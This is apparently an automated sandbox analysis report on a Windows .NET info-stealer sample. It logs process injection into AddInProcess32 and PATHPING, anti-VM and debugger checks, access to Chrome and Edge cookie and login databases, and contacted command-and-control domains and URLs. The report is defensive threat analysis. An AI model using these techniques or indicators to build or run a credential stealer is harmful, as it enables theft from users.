Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 4850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 81D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 91D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: 93B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: A3B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: A770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: B770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory allocated: C770000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rFV23+17555.exe	Window / User API: threadDelayed 8225			Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Window / User API: threadDelayed 1637			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\PATHPING.EXE	API coverage: 2.6 %

Source: C:\Users\user\Desktop\rFV23+17555.exe TID: 1772	Thread sleep time: -28592453314249787s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe TID: 1772	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\rFV23+17555.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: -0o5F4M6.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: rFV23+17555.exe, 00000000.00000002.2742755044.0000000003AD6000.00000004.00000800.00020000.00000000.sdmp, rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: rFV23+17555.exe, 00000000.00000002.2745500828.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: -0o5F4M6.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: -0o5F4M6.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: -0o5F4M6.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: -0o5F4M6.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: -0o5F4M6.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: -0o5F4M6.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: -0o5F4M6.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: rFV23+17555.exe, 00000000.00000002.2735199295.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294555263.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3238524190.000001AF297EC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -0o5F4M6.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: -0o5F4M6.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: -0o5F4M6.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: -0o5F4M6.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: -0o5F4M6.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: PATHPING.EXE, 00000007.00000002.3294360405.00000000026FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: -0o5F4M6.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: -0o5F4M6.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: -0o5F4M6.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: -0o5F4M6.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: -0o5F4M6.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: NULL target: C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 102E008	Jump to behavior

Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: gxDswOWWlPEzerVr.exe, 00000006.00000002.3294974074.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000006.00000000.2877196723.0000000001341000.00000002.00000001.00040000.00000000.sdmp, gxDswOWWlPEzerVr.exe, 00000008.00000002.3294969365.0000000001A31000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Users\user\Desktop\rFV23+17555.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rFV23+17555.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\PATHPING.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
134.122.178.173	ccxx.cat-dragon-diiojsofso.com	United States		64050	BCPL-SGBGPNETGlobalASNSG	false
108.186.14.193	www.dhgorm.top	United States		54600	PEGTECHINCUS	false

Windows Analysis Report rFV23+17555.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
rFV23+17555.exe

Malware Threat Intel
Provided by

Name	IP	Active
www.dhgorm.top	108.186.14.193	true
ccxx.cat-dragon-diiojsofso.com	134.122.178.173	true
www.66bm99.shop	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.dhgorm.top/s8hu/	false		unknown
http://www.66bm99.shop/s8hu/?UPVdm=spiDyH1b3uFUsTZxkISg08MBQMtSMA3+DyfgsgsxVWVMb+cPydsAHF754/iEUPAVeA5OBQjW9+XTnykROPWO/pmJGuCBnJv2R6Kqa3nD4OdTG3fimHjEv0IbRXA2Kbqi0w==&4tDdP=cl18T6Ap	false		unknown

ID:	1428881
Product:	CloudBasic
Start time:	19:10:07
Start date:	19.04.2024
Sample:	rFV23+17555.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	265a61c55a5139ac2ff0d9c53a64e1b1
SHA1:	edcc6a5534fbf0caa31a0e18d3c9f6b4e114465c
SHA256:	67611434a84b916587bc6a7f815cbe39f72c6403d304b1f1274d91e089e6527e
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rFV23+17555.exe.log	ASCII text, with CRLF line terminators	E193AFF55D4BDD9951CB4287A7D79653	F94AD920B9E0EB43B5005D74552AB84EAA38E985	08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
C:\Users\user\AppData\Local\Temp\-0o5F4M6	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA